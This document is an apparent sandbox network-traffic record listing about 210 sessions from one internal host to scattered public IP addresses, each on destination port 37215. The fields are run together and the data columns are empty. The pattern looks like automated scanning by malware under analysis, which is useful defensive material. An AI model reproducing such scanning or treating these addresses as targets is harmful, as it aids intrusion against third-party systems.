                                                  15363192.168.2.1348398133.185.71.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15364192.168.2.1346156157.91.22.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15365192.168.2.1333986197.98.104.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15366192.168.2.1336172197.54.197.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15367192.168.2.136063841.176.203.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15368192.168.2.134075641.67.136.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15369192.168.2.1336094157.120.82.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15370192.168.2.1351516197.145.145.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15371192.168.2.135819641.11.163.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15372192.168.2.133340641.185.229.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15373192.168.2.1335090223.156.150.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15374192.168.2.134749041.247.217.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15375192.168.2.136075441.104.41.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15376192.168.2.134231441.184.95.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15377192.168.2.1356846157.121.199.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15378192.168.2.1358060157.178.7.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15379192.168.2.1345046197.3.236.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15380192.168.2.135823476.242.77.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15381192.168.2.1351788157.14.40.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15382192.168.2.1339158197.109.208.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15383192.168.2.1347252197.239.153.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15384192.168.2.1342446197.3.33.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15385192.168.2.1345806197.184.159.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15386192.168.2.1339370104.162.109.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15387192.168.2.1357432197.85.246.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15388192.168.2.1358696152.155.244.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15389192.168.2.1351912124.72.51.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15390192.168.2.1339682143.250.157.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15391192.168.2.1344050157.88.85.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15392192.168.2.133476641.23.84.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15393192.168.2.1334962116.9.172.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15394192.168.2.1345654197.140.187.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15395192.168.2.135433841.23.56.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15396192.168.2.134551450.211.99.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15397192.168.2.1356256117.54.135.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15398192.168.2.135806441.55.220.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15399192.168.2.1355908197.176.190.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15400192.168.2.133713641.243.2.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15401192.168.2.135460641.128.124.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15402192.168.2.1337208157.127.120.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15403192.168.2.1341602157.226.45.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15404192.168.2.1356600197.195.178.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15405192.168.2.1351774189.105.213.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15406192.168.2.134655064.69.239.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15407192.168.2.1357716142.1.224.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15408192.168.2.1353504157.92.223.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15409192.168.2.1339924197.153.185.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15410192.168.2.1340374124.109.39.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15411192.168.2.133910041.176.19.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15412192.168.2.133861841.69.128.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15413192.168.2.1333690197.142.242.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15414192.168.2.134714441.45.82.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15415192.168.2.1347938197.73.182.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15416192.168.2.1348400101.72.88.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15417192.168.2.1353552157.22.130.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15418192.168.2.133446041.103.217.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15419192.168.2.13581062.24.25.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15420192.168.2.134693041.226.24.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15421192.168.2.135449673.120.151.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15422192.168.2.1344138197.13.103.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15423192.168.2.135706641.54.228.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15424192.168.2.1358154199.59.144.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15425192.168.2.1354410157.85.11.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15426192.168.2.1354588109.88.245.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15427192.168.2.135970041.246.64.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15428192.168.2.1342340157.95.17.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15429192.168.2.134654654.56.90.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15430192.168.2.135093441.174.200.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15431192.168.2.1357074197.249.96.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15432192.168.2.135468041.193.159.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15433192.168.2.133407441.35.224.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15434192.168.2.1343106197.73.148.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15435192.168.2.1359840157.225.22.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15436192.168.2.1333320197.212.252.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15437192.168.2.134566241.30.145.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15438192.168.2.1335564157.146.187.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15439192.168.2.1350330197.232.192.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15440192.168.2.1354886105.25.80.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15441192.168.2.1336756197.15.155.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15442192.168.2.1350998197.240.96.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15443192.168.2.135671041.233.240.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15444192.168.2.135906246.185.172.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15445192.168.2.135655841.3.227.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15446192.168.2.1343394157.47.212.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15447192.168.2.133810866.183.80.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15448192.168.2.1340274160.55.57.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15449192.168.2.1350506197.114.86.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15450192.168.2.133816441.92.23.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15451192.168.2.1349596197.4.225.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15452192.168.2.1353834145.228.58.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15453192.168.2.1349964197.72.138.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15454192.168.2.1351524157.233.228.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15455192.168.2.134715641.203.29.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15456192.168.2.133582641.172.149.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15457192.168.2.1343282157.66.63.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15458192.168.2.135779866.214.31.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15459192.168.2.1358642197.91.47.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15460192.168.2.135682257.104.73.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15461192.168.2.133390241.5.24.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15462192.168.2.135329241.207.8.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15463192.168.2.1346522157.216.9.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15464192.168.2.1348900197.168.142.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15465192.168.2.1341360197.152.27.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15466192.168.2.135524246.23.64.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15467192.168.2.1359874197.84.31.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15468192.168.2.1357202197.34.34.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15469192.168.2.133632841.151.242.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15470192.168.2.134639041.124.199.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15471192.168.2.133463659.65.29.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15472192.168.2.1345892111.37.207.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15473192.168.2.135664441.209.162.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15474192.168.2.135965241.197.205.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15475192.168.2.135855441.188.49.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15476192.168.2.1357150157.178.39.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15477192.168.2.1349164197.46.221.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15478192.168.2.1355262197.184.185.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15479192.168.2.1350340157.146.9.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15480192.168.2.1355336197.165.90.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15481192.168.2.1342288197.225.227.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15482192.168.2.1349000197.55.43.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15483192.168.2.1348914125.65.119.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15484192.168.2.1336566197.71.185.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15485192.168.2.135146041.173.91.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15486192.168.2.134266890.201.86.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15487192.168.2.1349024157.81.167.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15488192.168.2.1357472197.36.207.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15489192.168.2.134543657.134.39.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15490192.168.2.1357976157.125.169.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15491192.168.2.135704441.232.181.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15492192.168.2.1339458126.10.55.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15493192.168.2.1358812197.232.167.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15494192.168.2.134176641.205.200.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15495192.168.2.1353226157.184.150.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15496192.168.2.135275462.98.107.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15497192.168.2.1343716197.71.58.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15498192.168.2.134524641.71.48.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15499192.168.2.1352374170.159.66.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15500192.168.2.1336208157.124.177.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15501192.168.2.135710291.229.171.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15502192.168.2.1356378157.29.240.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15503192.168.2.1356372157.83.175.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15504192.168.2.1342628197.155.57.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15505192.168.2.1359156197.166.226.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15506192.168.2.1342504197.52.61.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15507192.168.2.134071841.101.89.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15508192.168.2.1342974157.84.140.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15509192.168.2.1349728157.155.90.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15510192.168.2.1359316197.198.223.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15511192.168.2.1335590176.97.180.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15512192.168.2.134210441.106.163.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15513192.168.2.135068041.134.126.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15514192.168.2.1353732157.72.105.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15515192.168.2.133494041.214.171.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15516192.168.2.1336762197.164.116.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15517192.168.2.134539041.193.74.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15518192.168.2.1343560197.56.155.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15519192.168.2.1355068197.234.72.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15520192.168.2.135539641.2.127.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15521192.168.2.1353748157.69.76.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15522192.168.2.1351064197.55.128.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15523192.168.2.133777066.171.127.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15524192.168.2.1341776221.189.19.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15525192.168.2.1353476157.176.223.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15526192.168.2.1337404197.22.176.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15527192.168.2.133730241.146.1.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15528192.168.2.1356494157.253.9.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15529192.168.2.1353800121.13.203.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15530192.168.2.1344932157.228.107.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15531192.168.2.136000019.123.174.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15532192.168.2.134896841.238.109.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15533192.168.2.1342500197.115.216.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15534192.168.2.1358066197.58.47.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15535192.168.2.133749641.250.92.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15536192.168.2.134624841.79.116.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15537192.168.2.134200641.1.67.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15538192.168.2.1337212197.180.97.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15539192.168.2.1340964157.121.172.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15540192.168.2.133283463.150.221.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15541192.168.2.1337702197.107.254.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15542192.168.2.1349714197.236.130.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15543192.168.2.1360724197.12.99.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15544192.168.2.1349504197.169.21.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15545192.168.2.133324841.230.132.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15546192.168.2.1353424197.119.69.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15547192.168.2.1340650205.152.74.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15548192.168.2.1346798197.84.81.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15549192.168.2.1359578197.189.194.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15550192.168.2.1345980197.96.23.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15551192.168.2.1337970197.140.10.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15552192.168.2.1348798197.53.239.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15553192.168.2.1355046157.236.242.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15554192.168.2.1355096197.81.218.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15555192.168.2.1335368157.2.42.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15556192.168.2.135131812.227.111.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15557192.168.2.134348841.147.247.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15558192.168.2.1336590157.180.20.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15559192.168.2.1351360157.130.117.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15560192.168.2.1342736197.144.7.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15561192.168.2.1353926197.34.162.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15562192.168.2.134418886.24.51.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15563192.168.2.1357856107.199.21.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15564192.168.2.1351074197.141.135.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15565192.168.2.1355178157.227.123.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15566192.168.2.134151041.233.49.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15567192.168.2.1335666157.212.3.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15568192.168.2.1354842110.40.130.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15569192.168.2.1356306157.138.199.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15570192.168.2.135108241.67.155.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15571192.168.2.1336956157.214.200.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15572192.168.2.135595441.246.82.3637215
